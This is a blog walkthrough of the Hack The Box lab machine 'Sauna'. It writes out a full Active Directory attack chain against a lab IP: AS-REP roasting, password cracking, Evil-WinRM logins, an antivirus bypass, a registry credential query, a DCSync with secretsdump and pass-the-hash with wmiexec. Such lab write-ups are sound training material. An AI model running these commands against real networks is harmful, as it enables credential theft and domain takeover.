Hack The Box Sauna

Intro

Sauna is a Windows Machine from Hack The Box that goes over a lot of different tools such as Impacket, WinPEAS, Bloodhound, and Evil-WinRM. We start by finding a couple of users from a webpage which leads us to using a Kerberoast brute force attack to grab their authentication hash. Once we gain access with that user, we find some saved auto-logon credentials of another user that we can use. We then perform a DC Sync attack which dumps all the domain hashes, including the administrator which leads to a pass the hash attack.

Nmap

We can enumerate ports and services with nmap using the command sudo nmap -v -sV -sC -oN nmap 10.10.10.175 -p-

We are given 20 open ports which is common for a Windows Server running a Domain Controller:

Ports 389 and 3268 for LDAP shows the domain name EGOTISTICAL-BANK.LOCAL, let’s keep that in mind. For now, let’s take a look at the WebPage.

Web Page

Going to http://10.10.10.175 shows a web page for Egotistical Bank:

While doing some manual enumeration, we come across some employee names on the About Us section of the website:

There is a danger about exposing names of employees for everyone to see. I created a text file of the employee names’:

Now we can use username-anarchy to generate some usernames and hopefully we can find one that we can use:

And we can see our output:

Kerberoasting

There is this great post on attacking Kerberos that includes AS-REP Roasting. Usually, when you request authentication through Kerberos, the requesting party has to authenticate itself to the Domain Controller. However, there is an option where the DC will just send the hash to an unauthenticated user: DONT_REQ_PREAUTH

We can use  Impacket’s GetNPUsers to look for any users that have this option enabled with the command  while read p; do GetNPUsers.py egotistical-bank.local/”$p” -request -no-pass -dc-ip 10.10.10.175; done < usernames.txt

And we get a hit for user fsmith

I saved the hash to a file called hash.txt and we can crack it using John the Ripper with the command john hash.txt –wordlist=<path to rockyou.txt>

And we are given the password Thestrokes23.

We can confirm our findings using crackmapexec with the command crackmapexec smb 10.10.10.175 -u fsmith -p Thestrokes23

We confirm our access to SMB but let’s see if we have remote access with crackmapexec winrm 10.10.10.175 -u fsmith -p Thestrokes23

And we do, so now we can use Evil-WinRM to establish a shell connection with evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

And we have access as FSmith. The user hash is found in FSmith’s Desktop directory:

Lateral Movement

I love Evil-WinRM’s ability to upload files and avoid any possible antivirus restrictions. We are going to use WinPeas to enumerate the system and see if we can find anything useful. First let’s go into Fsmith’s temp folder:

Going to the temp folder is not required, but it is good practice.

Then we can apply the AV bypass with the command Bypass-4MSI and then upload our WinPEAS binary with upload <local path to WinPEAS exe file>

You file path may vary

Then we can run it with ./WinPEASx64.exe

Looking through the output, we find two interesting things, first is the username of svc_loanmgr:

And the second thing, the password:

It does point out that the default username is svc_loanmanager but we can check what the current username is by looking at the users directory:

We also could have found the password with this handy dandy command that queries the registry: reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” 2>null | findstr “DefaultUserName DefaultDomainName DefaultPassword”

We can see if we have a remote connection for user svc_loanmgr with crackmapexec winrm 10.10.10.175 -u svc_loanmgr -p ‘Moneymakestheworldgoround!’

And we can use Evil-WinRM again with evil-winrm -i 10.10.10.175 -u svc_loanmgr -p ‘Moneymakestheworldgoround!’

Privilege Escalation

I tried running WinPEAS again as svc_loanmgr but was unable to find anything useful. However, since we are dealing with Active Directory, a great tool to use is Bloodhound.

Installing it is pretty straightforward, I actually found this pretty good instructions page here.

Once you have bloodhound all set up, let’s find the data we need by running SharpHound on the target system. You can find the Sharphound binary from here. From the SharpCollection directory, we can use this command to locate our file: find . | grep -i sharphound

Copy that to the directory you want upload it from and then we can repeat the steps from before:

Once it’s done running, you should have zip file that has been saved:

Using the download command, we can download the zip file to our current directory:

Bloodhound

Now that we have our Sharphound zip file, let’s fire up Bloodhound. First let’s start the neo4j console with sudo run neo4j console

Then on a separate terminal window, just type bloodhound

A login page should automatically open asking for your credentials:

Once logged in, we can upload the zip file by just clicking-and-dragging it onto the page:

Once it’s done. We can search for the user want to start with, which in this case is svc_loanmgr:

Right-click on the user node and Mark As Owned

Then head over to Analysis:

We can explore the DCSync attack. More information on that can be found here

We see that our node has GetChanges and GetChangesAll rights to the domain:

According to the article, the GetChanges and GetChangesAll rights is required to execute this attack:

Right-click on either the GetChanges or GetChangesAll line between the nodes and you can click on Help for more information:

The Info section also confirms our findings:

And the Abuse Info goes into how we can exploit this:

DCSync Attack

For a DCSync Attack, we can use Impacket’s secretsdump with the command secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:’Moneymakestheworldgoround!’@10.10.10.175

And we are given a couple of hashes, but most importantly, the Administrator hash. We can perform a Pass-The-Hash attack with Impacket’s wmiexec.py with the command wmiexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175

And we are in:

The root hash can be found in the Administrator’s Desktop Directory:

Conclusion

All in all, this was a fun box to learn a lot from. Understanding all of the different tools that you can use such as Impacket or Bloodhound will help you become a better PenTester. This box was challenging in the fact that the exploit paths weren’t always very visible. I found the use of the Kerberoasting attack using the employee’s name to be very realistic. Hope you enjoyed the write up!

Feel free to leave a comment if you have any questions or suggestions!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Create your website with WordPress.com
Get started
%d bloggers like this: